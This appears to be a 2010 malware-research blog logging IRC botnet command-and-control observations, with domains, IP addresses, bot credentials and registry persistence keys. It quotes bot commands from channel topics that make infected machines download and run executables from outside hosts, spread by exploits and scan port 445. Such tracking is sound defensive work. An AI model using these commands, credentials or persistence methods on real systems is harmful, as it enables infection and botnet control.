Wednesday, June 30, 2010

ulove.tigolbittys.info

Domains and Sub Domains
ilove.tigolbittys.info
ulove.tigolbittys.info
free.tinypicbox.com
one.tinypicbox.com

ulove.tigolbittys.info DNS_TYPE_A
178.32.55.3
83.15.10.202
91.121.78.121
178.32.48.79
178.32.49.4

Botnet C&C irc

83.15.10.202:7171

psyBNC2.3.2-7
Connected. Now logging in...
User Anonymous logged in.
-
Your IRC Client did not support a password. Please type /QUOTE PASS your password to connect.

Nick: [00|AUT|148343]
Username: XP-9617
Server Pass: fuck3d

Channel: #links#
Channel: #hp#

Topic is '^run.stop -s|^run http://dessertsrecipes.net/katrian/shell/r.exe c:\45jknl.exe 1|^asc -S -s|^http http://dessertsrecipes.net/katrian/shell/h.exe|^asc svrsvc_all 30 3 0 -e -b -s'
Set by ajlk on Wed Jun 30 05:55:57

Startup
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
info Windows Notify Service wntfy.exe

updat1.bejsis.com

Botnet C&C IRC
210.170.62.106:1234
Nick: n[AUT|XP]6732262
Username: 9142
Joined Channel: #dl#

Startup
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\
info Userinit C:\WINDOWS\system32\userinit.exe,C:\WINDOWS\redfil.exe

Tuesday, June 29, 2010

java.KUTLUFAMILY.COM

java.KUTLUFAMILY.COM
88.255.104.172:81
Botnet C&C irc
Nick: [00_AUT_XP_1113366]
Username: SP3-899
Joined Channel: #kk with Password ^B^B^B^B
Channel Topic for Channel #kk: ".asc -S -s |.http http://94.76.194.116/k.exe |.asc exp_all 10 5 0 -c -e |.asc exp_all 10 5 0 -b -r -e |.asc exp_all 5 5 0 -c |.down -S |.down http://94.76.194.116/bro.jpg c:\y2b3k2i6x6b9.exe c:\y2b3k2i6x6b9.exe -r -h"
Private Message to Channel #kk: "scan; Trying to get external IP."
Private Message to Channel #xs: "HTTP SET http://94.76.194.116/k.exe"
Private Message to Channel #kk: "scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 5 threads."
Private Message to Channel #kk: "scan; Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 10 threads."
Private Message to Channel #kk: "scan; Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 10 threads."

Startup
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
info Microsoft Driver Setup C:\WINDOWS\system32\Zsnkstm.exe
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run\
info Microsoft Driver Setup C:\WINDOWS\system32\Zsnkstm.exe

Friday, June 25, 2010

ms4alllll.tecBoom.com

ms4alllll.tecBoom.com:47221

Botnet C&C irc
o49949 changes topic to '.asc -S|.asc exp_all 25 2 0 -a -r|.asc exp_all 25 2 0 -b -r|.asc exp_all 25 2 0 -c'
* o49949 changes topic to 'finito'

Channels
/jojo #dpi
/jojo #a

.asc -S|.http http://208.53.183.164/httpd.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 25 5 0 -b|.asc exp_all 25 5 0 -c

Channel #-: ".asc -S|.http http://208.53.183.162/ma32ol.exe|.asc exp_all 25 5 0 -a -r -e|.asc exp_all 25 5 0 -b -r -e|.asc exp_all 25 5 0 -b|.asc exp_all 25 5 0 -c"

Private Message to Channel #i: "HTTP SET http://208.53.183.162/ma32ol.exe"
Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Sequential Port Scan started on 192.168.0.0:445 with a delay of 5 seconds for 0 minutes using 25 threads."
Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Random Port Scan started on 192.x.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads."
Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Random Port Scan started on 192.168.x.x:445 with a delay of 5 seconds for 0 minutes using 25 threads."
Private Message to User [N00_AUT_XP_0662\xbc\xb9@: "scan// Trying to get external IP."

Registry entries added so that cndrive32.exe runs every time Windows starts:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
Microsoft Driver Setup = "%Windir%\cndrive32.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
Microsoft Driver Setup = "%Windir%\cndrive32.exe"

